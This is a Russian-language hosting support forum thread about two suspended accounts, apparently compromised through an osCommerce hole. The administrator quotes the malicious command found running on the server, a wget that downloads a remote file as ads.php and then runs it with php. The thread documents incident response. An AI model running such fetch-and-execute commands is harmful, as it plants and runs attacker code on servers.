EOMY.NET
Хостинг EOMY.NET: Форум поддержки

FAQFAQ   ПоискПоиск   ПользователиПользователи   ГруппыГруппы   РегистрацияРегистрация 
 ПрофильПрофиль   Войти и проверить личные сообщенияВойти и проверить личные сообщения   ВходВход 
RSS Feed  

deps.it - vagshop.net - This Account Has Been Suspended

Начать новую тему   Ответить на тему    Список форумов EOMY.NET -> Техническая поддержка
deps.it - vagshop.net - This Account Has Been Suspended
Автор Сообщение
Eric

1004 Монеты

СообщениеДобавлено: Вс, 30 Окт, 2011 12:44    Заголовок сообщения: deps.it - vagshop.net - This Account Has Been Suspended Ответить с цитатой

Здравствуйте.
В кои то веки vagshop.net - This Account Has Been Suspended.
Также и deps.it - This Account Has Been Suspended.
Ни письма ни чего. Можно узнать причину и когда разблочат?
Даже не могу зайти в спанель.
Спасибо
Посмотреть профиль Отправить личное сообщение Посетить сайт автора
Eric

1004 Монеты

СообщениеДобавлено: Вс, 30 Окт, 2011 16:59    Заголовок сообщения: Ответить с цитатой

Уважаемая служба поддержки, вы можете указать причины блокировки и что мне надо делать... Потому как я остановлен и незнаю что предпринимать: искать другой хостинг, исправлять какие-то ошибки или что?... Мне необходимо очень срочно предпринять что-то, а я незнаю даже что случилось. Я даже не могу ни бекап сделать, ни файлы унести... Плиз. Спасибо
Аккаунт: eric.fsay.net
eomysupport
Администратор
Администратор

66446 Монеты

СообщениеДобавлено: Пн, 31 Окт, 2011 03:20    Заголовок сообщения: Ответить с цитатой

Здравствуйте,

Ваш аккаунт стал причиной недоступности сервера: ссылка. Что-то (или кто-то) запускал множество процессов из-под вашего аккаунта:

Код:
sh -c wget http://machomantshirt.com/text/txt.txt -O ads.php; php ads.php

Я выслал вам ссылку на полную резервную копию вашего сайта. Пожалуйста, сообщите, какие шаги вы предпримите, чтобы решить эту проблему.

Спасибо.

Техническая поддержка бесплатного хостинга осуществляется только через форум поддержки
Часто задаваемые вопросы по хостингу
Условия предоставления услуг бесплатного хостинга
Посмотреть профиль Отправить личное сообщение
Eric

1004 Монеты

СообщениеДобавлено: Пн, 31 Окт, 2011 05:29    Заголовок сообщения: Ответить с цитатой

Здравствуйте.
Спасибо большое за ответы и бекап.
Если происходит такое - скорее всего аккаунт взломан, это похоже на тспфлудер. Разве мой аккаунт может запускать вгет и шелл?
Поменяю все пароли внутри сайтов, вы поменяйте мне пароли к фтп и панели. Пороюсь по файлам. Думаю это уязвимость Томата (оскоммерц)

Этот ads.php я нашел в папке shop . он не относится к моиму двиглу вообще, как-то его залили туда. удалить

Короче уже знаю через как все делалось...
Плиз, не могли бы вы сменить мне имя пользователя и пароль к аккаунту, БД и т.д и отправить на мейл. Ближе к вечеру (по европе) я все зачищу.
Спасибо.
eomysupport
Администратор
Администратор

66446 Монеты

СообщениеДобавлено: Пн, 31 Окт, 2011 07:17    Заголовок сообщения: Ответить с цитатой

Здравствуйте,

На сервере FSAY/ZOXT вы можете запускать команды в shell, как и на любом полноценном хостинге.

Я сменил пароль к панели управления и выслал его вам в личку. Он же установлен и для главного FTP аккаунта. Остальные пароли вы можете сменить в панели управления.

Я разблокировал аккаунт. Чтобы не допустить чудес до того, как вы сможете заняться сайтом, я добавил в .htaccess следующую строку:

Код:
Deny from all

Спасибо.

Техническая поддержка бесплатного хостинга осуществляется только через форум поддержки
Часто задаваемые вопросы по хостингу
Условия предоставления услуг бесплатного хостинга
Посмотреть профиль Отправить личное сообщение
Начать новую тему   Ответить на тему    Список форумов EOMY.NET -> Техническая поддержка Часовой пояс: GMT
Страница 1 из 1

EOMY TOP 100 Rambler's Top100   Рейтинг@Mail.ru